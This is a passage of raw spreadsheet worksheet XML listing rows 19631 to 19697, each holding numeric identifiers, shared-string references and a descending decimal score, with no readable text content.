    </row>
    <row r="19631" ht="15.75" customHeight="1">
      <c r="A19631" s="1">
        <v>32421.0</v>
      </c>
      <c r="B19631" s="2">
        <v>5.6439593E7</v>
      </c>
      <c r="C19631" s="2" t="s">
        <v>18918</v>
      </c>
      <c r="D19631" s="2">
        <v>1.0</v>
      </c>
      <c r="E19631" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19631" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="19632" ht="15.75" customHeight="1">
      <c r="A19632" s="1">
        <v>13931.0</v>
      </c>
      <c r="B19632" s="2">
        <v>3.7105453E7</v>
      </c>
      <c r="C19632" s="2" t="s">
        <v>18919</v>
      </c>
      <c r="D19632" s="2">
        <v>1.0</v>
      </c>
      <c r="E19632" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19632" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="19633" ht="15.75" customHeight="1">
      <c r="A19633" s="1">
        <v>7087.0</v>
      </c>
      <c r="B19633" s="2">
        <v>5.0290335E7</v>
      </c>
      <c r="C19633" s="2" t="s">
        <v>18920</v>
      </c>
      <c r="D19633" s="2">
        <v>1.0</v>
      </c>
      <c r="E19633" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19633" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="19634" ht="15.75" customHeight="1">
      <c r="A19634" s="1">
        <v>24846.0</v>
      </c>
      <c r="B19634" s="2">
        <v>1.218968E7</v>
      </c>
      <c r="C19634" s="2" t="s">
        <v>18921</v>
      </c>
      <c r="D19634" s="2">
        <v>1.0</v>
      </c>
      <c r="E19634" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19634" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="19635" ht="15.75" customHeight="1">
      <c r="A19635" s="1">
        <v>26918.0</v>
      </c>
      <c r="B19635" s="2">
        <v>1.9397036E7</v>
      </c>
      <c r="C19635" s="2" t="s">
        <v>18922</v>
      </c>
      <c r="D19635" s="2">
        <v>1.0</v>
      </c>
      <c r="E19635" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19635" s="2">
        <v>0.1536458333333334</v>
      </c>
    </row>
    <row r="19636" ht="15.75" customHeight="1">
      <c r="A19636" s="1">
        <v>1202.0</v>
      </c>
      <c r="B19636" s="2">
        <v>2.4793846E7</v>
      </c>
      <c r="C19636" s="2" t="s">
        <v>18923</v>
      </c>
      <c r="D19636" s="2">
        <v>1.0</v>
      </c>
      <c r="E19636" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19636" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="19637" ht="15.75" customHeight="1">
      <c r="A19637" s="1">
        <v>5910.0</v>
      </c>
      <c r="B19637" s="2">
        <v>4.7202668E7</v>
      </c>
      <c r="C19637" s="2" t="s">
        <v>18924</v>
      </c>
      <c r="D19637" s="2">
        <v>1.0</v>
      </c>
      <c r="E19637" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19637" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="19638" ht="15.75" customHeight="1">
      <c r="A19638" s="1">
        <v>7097.0</v>
      </c>
      <c r="B19638" s="2">
        <v>5.0313261E7</v>
      </c>
      <c r="C19638" s="2" t="s">
        <v>18925</v>
      </c>
      <c r="D19638" s="2">
        <v>1.0</v>
      </c>
      <c r="E19638" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19638" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
    <row r="19639" ht="15.75" customHeight="1">
      <c r="A19639" s="1">
        <v>10049.0</v>
      </c>
      <c r="B19639" s="2">
        <v>5.7106683E7</v>
      </c>
      <c r="C19639" s="2" t="s">
        <v>18926</v>
      </c>
      <c r="D19639" s="2">
        <v>1.0</v>
      </c>
      <c r="E19639" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19639" s="2">
        <v>0.153225806451613</v>
      </c>
    </row>
    <row r="19640" ht="15.75" customHeight="1">
      <c r="A19640" s="1">
        <v>17017.0</v>
      </c>
      <c r="B19640" s="2">
        <v>4.845141E7</v>
      </c>
      <c r="C19640" s="2" t="s">
        <v>18927</v>
      </c>
      <c r="D19640" s="2">
        <v>1.0</v>
      </c>
      <c r="E19640" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19640" s="2">
        <v>0.153225806451613</v>
      </c>
    </row>
    <row r="19641" ht="15.75" customHeight="1">
      <c r="A19641" s="1">
        <v>1779.0</v>
      </c>
      <c r="B19641" s="2">
        <v>2.9030947E7</v>
      </c>
      <c r="C19641" s="2" t="s">
        <v>18928</v>
      </c>
      <c r="D19641" s="2">
        <v>1.0</v>
      </c>
      <c r="E19641" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19641" s="2">
        <v>0.152991452991453</v>
      </c>
    </row>
    <row r="19642" ht="15.75" customHeight="1">
      <c r="A19642" s="1">
        <v>6821.0</v>
      </c>
      <c r="B19642" s="2">
        <v>4.9554464E7</v>
      </c>
      <c r="C19642" s="2" t="s">
        <v>18929</v>
      </c>
      <c r="D19642" s="2">
        <v>1.0</v>
      </c>
      <c r="E19642" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19642" s="2">
        <v>0.152991452991453</v>
      </c>
    </row>
    <row r="19643" ht="15.75" customHeight="1">
      <c r="A19643" s="1">
        <v>17092.0</v>
      </c>
      <c r="B19643" s="2">
        <v>4.8663696E7</v>
      </c>
      <c r="C19643" s="2" t="s">
        <v>18930</v>
      </c>
      <c r="D19643" s="2">
        <v>1.0</v>
      </c>
      <c r="E19643" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19643" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="19644" ht="15.75" customHeight="1">
      <c r="A19644" s="1">
        <v>29808.0</v>
      </c>
      <c r="B19644" s="2">
        <v>3.5174229E7</v>
      </c>
      <c r="C19644" s="2" t="s">
        <v>18931</v>
      </c>
      <c r="D19644" s="2">
        <v>1.0</v>
      </c>
      <c r="E19644" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19644" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="19645" ht="15.75" customHeight="1">
      <c r="A19645" s="1">
        <v>4489.0</v>
      </c>
      <c r="B19645" s="2">
        <v>4.2518731E7</v>
      </c>
      <c r="C19645" s="2" t="s">
        <v>18932</v>
      </c>
      <c r="D19645" s="2">
        <v>1.0</v>
      </c>
      <c r="E19645" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19645" s="2">
        <v>0.1526019690576653</v>
      </c>
    </row>
    <row r="19646" ht="15.75" customHeight="1">
      <c r="A19646" s="1">
        <v>6883.0</v>
      </c>
      <c r="B19646" s="2">
        <v>4.973816E7</v>
      </c>
      <c r="C19646" s="2" t="s">
        <v>18933</v>
      </c>
      <c r="D19646" s="2">
        <v>1.0</v>
      </c>
      <c r="E19646" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19646" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="19647" ht="15.75" customHeight="1">
      <c r="A19647" s="1">
        <v>3024.0</v>
      </c>
      <c r="B19647" s="2">
        <v>3.6424458E7</v>
      </c>
      <c r="C19647" s="2" t="s">
        <v>18934</v>
      </c>
      <c r="D19647" s="2">
        <v>1.0</v>
      </c>
      <c r="E19647" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19647" s="2">
        <v>0.1520061728395062</v>
      </c>
    </row>
    <row r="19648" ht="15.75" customHeight="1">
      <c r="A19648" s="1">
        <v>3635.0</v>
      </c>
      <c r="B19648" s="2">
        <v>3.9276629E7</v>
      </c>
      <c r="C19648" s="2" t="s">
        <v>18935</v>
      </c>
      <c r="D19648" s="2">
        <v>1.0</v>
      </c>
      <c r="E19648" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19648" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="19649" ht="15.75" customHeight="1">
      <c r="A19649" s="1">
        <v>9395.0</v>
      </c>
      <c r="B19649" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C19649" s="2" t="s">
        <v>18936</v>
      </c>
      <c r="D19649" s="2">
        <v>1.0</v>
      </c>
      <c r="E19649" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19649" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="19650" ht="15.75" customHeight="1">
      <c r="A19650" s="1">
        <v>18362.0</v>
      </c>
      <c r="B19650" s="2">
        <v>5.2548829E7</v>
      </c>
      <c r="C19650" s="2" t="s">
        <v>18937</v>
      </c>
      <c r="D19650" s="2">
        <v>1.0</v>
      </c>
      <c r="E19650" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19650" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="19651" ht="15.75" customHeight="1">
      <c r="A19651" s="1">
        <v>30400.0</v>
      </c>
      <c r="B19651" s="2">
        <v>3.8697756E7</v>
      </c>
      <c r="C19651" s="2" t="s">
        <v>18938</v>
      </c>
      <c r="D19651" s="2">
        <v>1.0</v>
      </c>
      <c r="E19651" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19651" s="2">
        <v>0.1509259259259259</v>
      </c>
    </row>
    <row r="19652" ht="15.75" customHeight="1">
      <c r="A19652" s="1">
        <v>6196.0</v>
      </c>
      <c r="B19652" s="2">
        <v>4.795454E7</v>
      </c>
      <c r="C19652" s="2" t="s">
        <v>18939</v>
      </c>
      <c r="D19652" s="2">
        <v>1.0</v>
      </c>
      <c r="E19652" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19652" s="2">
        <v>0.1506734006734007</v>
      </c>
    </row>
    <row r="19653" ht="15.75" customHeight="1">
      <c r="A19653" s="1">
        <v>7701.0</v>
      </c>
      <c r="B19653" s="2">
        <v>5.1973957E7</v>
      </c>
      <c r="C19653" s="2" t="s">
        <v>18940</v>
      </c>
      <c r="D19653" s="2">
        <v>1.0</v>
      </c>
      <c r="E19653" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19653" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="19654" ht="15.75" customHeight="1">
      <c r="A19654" s="1">
        <v>8128.0</v>
      </c>
      <c r="B19654" s="2">
        <v>5.309936E7</v>
      </c>
      <c r="C19654" s="2" t="s">
        <v>18941</v>
      </c>
      <c r="D19654" s="2">
        <v>1.0</v>
      </c>
      <c r="E19654" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19654" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="19655" ht="15.75" customHeight="1">
      <c r="A19655" s="1">
        <v>12711.0</v>
      </c>
      <c r="B19655" s="2">
        <v>3.0838789E7</v>
      </c>
      <c r="C19655" s="2" t="s">
        <v>18942</v>
      </c>
      <c r="D19655" s="2">
        <v>1.0</v>
      </c>
      <c r="E19655" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19655" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="19656" ht="15.75" customHeight="1">
      <c r="A19656" s="1">
        <v>15211.0</v>
      </c>
      <c r="B19656" s="2">
        <v>4.2136773E7</v>
      </c>
      <c r="C19656" s="2" t="s">
        <v>18943</v>
      </c>
      <c r="D19656" s="2">
        <v>1.0</v>
      </c>
      <c r="E19656" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19656" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="19657" ht="15.75" customHeight="1">
      <c r="A19657" s="1">
        <v>17722.0</v>
      </c>
      <c r="B19657" s="2">
        <v>5.0627166E7</v>
      </c>
      <c r="C19657" s="2" t="s">
        <v>18944</v>
      </c>
      <c r="D19657" s="2">
        <v>1.0</v>
      </c>
      <c r="E19657" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19657" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="19658" ht="15.75" customHeight="1">
      <c r="A19658" s="1">
        <v>18463.0</v>
      </c>
      <c r="B19658" s="2">
        <v>5.2830591E7</v>
      </c>
      <c r="C19658" s="5" t="s">
        <v>18945</v>
      </c>
      <c r="D19658" s="2">
        <v>1.0</v>
      </c>
      <c r="E19658" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19658" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="19659" ht="15.75" customHeight="1">
      <c r="A19659" s="1">
        <v>4813.0</v>
      </c>
      <c r="B19659" s="2">
        <v>4.3566492E7</v>
      </c>
      <c r="C19659" s="5" t="s">
        <v>18946</v>
      </c>
      <c r="D19659" s="2">
        <v>1.0</v>
      </c>
      <c r="E19659" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19659" s="2">
        <v>0.1502732240437158</v>
      </c>
    </row>
    <row r="19660" ht="15.75" customHeight="1">
      <c r="A19660" s="1">
        <v>12421.0</v>
      </c>
      <c r="B19660" s="2">
        <v>2.9150456E7</v>
      </c>
      <c r="C19660" s="2" t="s">
        <v>18947</v>
      </c>
      <c r="D19660" s="2">
        <v>1.0</v>
      </c>
      <c r="E19660" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19660" s="2">
        <v>0.1501736111111112</v>
      </c>
    </row>
    <row r="19661" ht="15.75" customHeight="1">
      <c r="A19661" s="1">
        <v>2871.0</v>
      </c>
      <c r="B19661" s="2">
        <v>3.5583478E7</v>
      </c>
      <c r="C19661" s="2" t="s">
        <v>18948</v>
      </c>
      <c r="D19661" s="2">
        <v>1.0</v>
      </c>
      <c r="E19661" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19661" s="2">
        <v>0.1495726495726496</v>
      </c>
    </row>
    <row r="19662" ht="15.75" customHeight="1">
      <c r="A19662" s="1">
        <v>349.0</v>
      </c>
      <c r="B19662" s="2">
        <v>1.6044962E7</v>
      </c>
      <c r="C19662" s="2" t="s">
        <v>18949</v>
      </c>
      <c r="D19662" s="2">
        <v>1.0</v>
      </c>
      <c r="E19662" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19662" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="19663" ht="15.75" customHeight="1">
      <c r="A19663" s="1">
        <v>1139.0</v>
      </c>
      <c r="B19663" s="2">
        <v>2.4240303E7</v>
      </c>
      <c r="C19663" s="2" t="s">
        <v>18950</v>
      </c>
      <c r="D19663" s="2">
        <v>1.0</v>
      </c>
      <c r="E19663" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19663" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="19664" ht="15.75" customHeight="1">
      <c r="A19664" s="1">
        <v>5375.0</v>
      </c>
      <c r="B19664" s="2">
        <v>4.5397319E7</v>
      </c>
      <c r="C19664" s="2" t="s">
        <v>18951</v>
      </c>
      <c r="D19664" s="2">
        <v>1.0</v>
      </c>
      <c r="E19664" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19664" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="19665" ht="15.75" customHeight="1">
      <c r="A19665" s="1">
        <v>5638.0</v>
      </c>
      <c r="B19665" s="2">
        <v>4.6257989E7</v>
      </c>
      <c r="C19665" s="2" t="s">
        <v>18952</v>
      </c>
      <c r="D19665" s="2">
        <v>1.0</v>
      </c>
      <c r="E19665" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19665" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="19666" ht="15.75" customHeight="1">
      <c r="A19666" s="1">
        <v>14767.0</v>
      </c>
      <c r="B19666" s="2">
        <v>4.0835921E7</v>
      </c>
      <c r="C19666" s="2" t="s">
        <v>18953</v>
      </c>
      <c r="D19666" s="2">
        <v>1.0</v>
      </c>
      <c r="E19666" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19666" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="19667" ht="15.75" customHeight="1">
      <c r="A19667" s="1">
        <v>17110.0</v>
      </c>
      <c r="B19667" s="2">
        <v>4.8738596E7</v>
      </c>
      <c r="C19667" s="2" t="s">
        <v>18954</v>
      </c>
      <c r="D19667" s="2">
        <v>1.0</v>
      </c>
      <c r="E19667" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19667" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="19668" ht="15.75" customHeight="1">
      <c r="A19668" s="1">
        <v>16869.0</v>
      </c>
      <c r="B19668" s="2">
        <v>4.7956305E7</v>
      </c>
      <c r="C19668" s="2" t="s">
        <v>18955</v>
      </c>
      <c r="D19668" s="2">
        <v>1.0</v>
      </c>
      <c r="E19668" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19668" s="2">
        <v>0.147897897897898</v>
      </c>
    </row>
    <row r="19669" ht="15.75" customHeight="1">
      <c r="A19669" s="1">
        <v>5345.0</v>
      </c>
      <c r="B19669" s="2">
        <v>4.5341348E7</v>
      </c>
      <c r="C19669" s="2" t="s">
        <v>18956</v>
      </c>
      <c r="D19669" s="2">
        <v>1.0</v>
      </c>
      <c r="E19669" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19669" s="2">
        <v>0.1478758169934641</v>
      </c>
    </row>
    <row r="19670" ht="15.75" customHeight="1">
      <c r="A19670" s="1">
        <v>6739.0</v>
      </c>
      <c r="B19670" s="2">
        <v>4.9351012E7</v>
      </c>
      <c r="C19670" s="2" t="s">
        <v>18957</v>
      </c>
      <c r="D19670" s="2">
        <v>1.0</v>
      </c>
      <c r="E19670" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19670" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="19671" ht="15.75" customHeight="1">
      <c r="A19671" s="1">
        <v>9031.0</v>
      </c>
      <c r="B19671" s="2">
        <v>5.5038874E7</v>
      </c>
      <c r="C19671" s="2" t="s">
        <v>18958</v>
      </c>
      <c r="D19671" s="2">
        <v>1.0</v>
      </c>
      <c r="E19671" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19671" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="19672" ht="15.75" customHeight="1">
      <c r="A19672" s="1">
        <v>2144.0</v>
      </c>
      <c r="B19672" s="2">
        <v>3.1620375E7</v>
      </c>
      <c r="C19672" s="2" t="s">
        <v>18959</v>
      </c>
      <c r="D19672" s="2">
        <v>1.0</v>
      </c>
      <c r="E19672" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19672" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="19673" ht="15.75" customHeight="1">
      <c r="A19673" s="1">
        <v>4365.0</v>
      </c>
      <c r="B19673" s="2">
        <v>4.2122553E7</v>
      </c>
      <c r="C19673" s="2" t="s">
        <v>18960</v>
      </c>
      <c r="D19673" s="2">
        <v>1.0</v>
      </c>
      <c r="E19673" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19673" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="19674" ht="15.75" customHeight="1">
      <c r="A19674" s="1">
        <v>28063.0</v>
      </c>
      <c r="B19674" s="2">
        <v>2.4574484E7</v>
      </c>
      <c r="C19674" s="2" t="s">
        <v>18961</v>
      </c>
      <c r="D19674" s="2">
        <v>1.0</v>
      </c>
      <c r="E19674" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19674" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="19675" ht="15.75" customHeight="1">
      <c r="A19675" s="1">
        <v>7705.0</v>
      </c>
      <c r="B19675" s="2">
        <v>5.1994585E7</v>
      </c>
      <c r="C19675" s="2" t="s">
        <v>18962</v>
      </c>
      <c r="D19675" s="2">
        <v>1.0</v>
      </c>
      <c r="E19675" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19675" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="19676" ht="15.75" customHeight="1">
      <c r="A19676" s="1">
        <v>4611.0</v>
      </c>
      <c r="B19676" s="2">
        <v>4.2909625E7</v>
      </c>
      <c r="C19676" s="2" t="s">
        <v>18963</v>
      </c>
      <c r="D19676" s="2">
        <v>1.0</v>
      </c>
      <c r="E19676" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19676" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="19677" ht="15.75" customHeight="1">
      <c r="A19677" s="1">
        <v>20716.0</v>
      </c>
      <c r="B19677" s="2">
        <v>1.4625176E7</v>
      </c>
      <c r="C19677" s="2" t="s">
        <v>18964</v>
      </c>
      <c r="D19677" s="2">
        <v>1.0</v>
      </c>
      <c r="E19677" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19677" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="19678" ht="15.75" customHeight="1">
      <c r="A19678" s="1">
        <v>8366.0</v>
      </c>
      <c r="B19678" s="2">
        <v>5.379702E7</v>
      </c>
      <c r="C19678" s="2" t="s">
        <v>18965</v>
      </c>
      <c r="D19678" s="2">
        <v>1.0</v>
      </c>
      <c r="E19678" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19678" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="19679" ht="15.75" customHeight="1">
      <c r="A19679" s="1">
        <v>12338.0</v>
      </c>
      <c r="B19679" s="2">
        <v>2.8593447E7</v>
      </c>
      <c r="C19679" s="2" t="s">
        <v>18966</v>
      </c>
      <c r="D19679" s="2">
        <v>1.0</v>
      </c>
      <c r="E19679" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19679" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="19680" ht="15.75" customHeight="1">
      <c r="A19680" s="1">
        <v>30985.0</v>
      </c>
      <c r="B19680" s="2">
        <v>4.755862E7</v>
      </c>
      <c r="C19680" s="2" t="s">
        <v>18967</v>
      </c>
      <c r="D19680" s="2">
        <v>1.0</v>
      </c>
      <c r="E19680" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19680" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="19681" ht="15.75" customHeight="1">
      <c r="A19681" s="1">
        <v>8440.0</v>
      </c>
      <c r="B19681" s="2">
        <v>5.3958839E7</v>
      </c>
      <c r="C19681" s="2" t="s">
        <v>18968</v>
      </c>
      <c r="D19681" s="2">
        <v>1.0</v>
      </c>
      <c r="E19681" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19681" s="2">
        <v>0.1456228956228957</v>
      </c>
    </row>
    <row r="19682" ht="15.75" customHeight="1">
      <c r="A19682" s="1">
        <v>13515.0</v>
      </c>
      <c r="B19682" s="2">
        <v>3.5483859E7</v>
      </c>
      <c r="C19682" s="2" t="s">
        <v>18969</v>
      </c>
      <c r="D19682" s="2">
        <v>1.0</v>
      </c>
      <c r="E19682" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19682" s="2">
        <v>0.1456228956228957</v>
      </c>
    </row>
    <row r="19683" ht="15.75" customHeight="1">
      <c r="A19683" s="1">
        <v>4306.0</v>
      </c>
      <c r="B19683" s="2">
        <v>4.1958357E7</v>
      </c>
      <c r="C19683" s="2" t="s">
        <v>18970</v>
      </c>
      <c r="D19683" s="2">
        <v>1.0</v>
      </c>
      <c r="E19683" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19683" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="19684" ht="15.75" customHeight="1">
      <c r="A19684" s="1">
        <v>4541.0</v>
      </c>
      <c r="B19684" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C19684" s="2" t="s">
        <v>18971</v>
      </c>
      <c r="D19684" s="2">
        <v>1.0</v>
      </c>
      <c r="E19684" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19684" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="19685" ht="15.75" customHeight="1">
      <c r="A19685" s="1">
        <v>12320.0</v>
      </c>
      <c r="B19685" s="2">
        <v>2.8478962E7</v>
      </c>
      <c r="C19685" s="2" t="s">
        <v>18972</v>
      </c>
      <c r="D19685" s="2">
        <v>1.0</v>
      </c>
      <c r="E19685" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19685" s="2">
        <v>0.1453703703703703</v>
      </c>
    </row>
    <row r="19686" ht="15.75" customHeight="1">
      <c r="A19686" s="1">
        <v>8231.0</v>
      </c>
      <c r="B19686" s="2">
        <v>5.3350724E7</v>
      </c>
      <c r="C19686" s="2" t="s">
        <v>18973</v>
      </c>
      <c r="D19686" s="2">
        <v>1.0</v>
      </c>
      <c r="E19686" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19686" s="2">
        <v>0.1452380952380953</v>
      </c>
    </row>
    <row r="19687" ht="15.75" customHeight="1">
      <c r="A19687" s="1">
        <v>24817.0</v>
      </c>
      <c r="B19687" s="2">
        <v>1.2086544E7</v>
      </c>
      <c r="C19687" s="2" t="s">
        <v>18974</v>
      </c>
      <c r="D19687" s="2">
        <v>1.0</v>
      </c>
      <c r="E19687" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19687" s="2">
        <v>0.1452380952380953</v>
      </c>
    </row>
    <row r="19688" ht="15.75" customHeight="1">
      <c r="A19688" s="1">
        <v>13263.0</v>
      </c>
      <c r="B19688" s="2">
        <v>3.4324895E7</v>
      </c>
      <c r="C19688" s="2" t="s">
        <v>18975</v>
      </c>
      <c r="D19688" s="2">
        <v>1.0</v>
      </c>
      <c r="E19688" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19688" s="2">
        <v>0.1450617283950617</v>
      </c>
    </row>
    <row r="19689" ht="15.75" customHeight="1">
      <c r="A19689" s="1">
        <v>17462.0</v>
      </c>
      <c r="B19689" s="2">
        <v>4.9846401E7</v>
      </c>
      <c r="C19689" s="2" t="s">
        <v>18976</v>
      </c>
      <c r="D19689" s="2">
        <v>1.0</v>
      </c>
      <c r="E19689" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19689" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="19690" ht="15.75" customHeight="1">
      <c r="A19690" s="1">
        <v>14159.0</v>
      </c>
      <c r="B19690" s="2">
        <v>3.8011348E7</v>
      </c>
      <c r="C19690" s="2" t="s">
        <v>18977</v>
      </c>
      <c r="D19690" s="2">
        <v>1.0</v>
      </c>
      <c r="E19690" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19690" s="2">
        <v>0.1447574334898279</v>
      </c>
    </row>
    <row r="19691" ht="15.75" customHeight="1">
      <c r="A19691" s="1">
        <v>27781.0</v>
      </c>
      <c r="B19691" s="2">
        <v>2.3127582E7</v>
      </c>
      <c r="C19691" s="2" t="s">
        <v>18978</v>
      </c>
      <c r="D19691" s="2">
        <v>1.0</v>
      </c>
      <c r="E19691" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19691" s="2">
        <v>0.1445868945868946</v>
      </c>
    </row>
    <row r="19692" ht="15.75" customHeight="1">
      <c r="A19692" s="1">
        <v>32870.0</v>
      </c>
      <c r="B19692" s="2">
        <v>6300570.0</v>
      </c>
      <c r="C19692" s="2" t="s">
        <v>18979</v>
      </c>
      <c r="D19692" s="2">
        <v>1.0</v>
      </c>
      <c r="E19692" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19692" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="19693" ht="15.75" customHeight="1">
      <c r="A19693" s="1">
        <v>2178.0</v>
      </c>
      <c r="B19693" s="2">
        <v>3.1810276E7</v>
      </c>
      <c r="C19693" s="2" t="s">
        <v>18980</v>
      </c>
      <c r="D19693" s="2">
        <v>1.0</v>
      </c>
      <c r="E19693" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19693" s="2">
        <v>0.1444444444444444</v>
      </c>
    </row>
    <row r="19694" ht="15.75" customHeight="1">
      <c r="A19694" s="1">
        <v>13609.0</v>
      </c>
      <c r="B19694" s="2">
        <v>3.5823306E7</v>
      </c>
      <c r="C19694" s="2" t="s">
        <v>18981</v>
      </c>
      <c r="D19694" s="2">
        <v>1.0</v>
      </c>
      <c r="E19694" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19694" s="2">
        <v>0.1444444444444444</v>
      </c>
    </row>
    <row r="19695" ht="15.75" customHeight="1">
      <c r="A19695" s="1">
        <v>9967.0</v>
      </c>
      <c r="B19695" s="2">
        <v>5.6941682E7</v>
      </c>
      <c r="C19695" s="2" t="s">
        <v>18982</v>
      </c>
      <c r="D19695" s="2">
        <v>1.0</v>
      </c>
      <c r="E19695" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19695" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="19696" ht="15.75" customHeight="1">
      <c r="A19696" s="1">
        <v>17501.0</v>
      </c>
      <c r="B19696" s="2">
        <v>5.0005842E7</v>
      </c>
      <c r="C19696" s="2" t="s">
        <v>18983</v>
      </c>
      <c r="D19696" s="2">
        <v>1.0</v>
      </c>
      <c r="E19696" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19696" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="19697" ht="15.75" customHeight="1">
      <c r="A19697" s="1">
        <v>2272.0</v>
      </c>
      <c r="B19697" s="2">
        <v>3.2521436E7</v>
      </c>
      <c r="C19697" s="2" t="s">
        <v>18984</v>
      </c>
      <c r="D19697" s="2">
        <v>1.0</v>
      </c>
      <c r="E19697" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19697" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
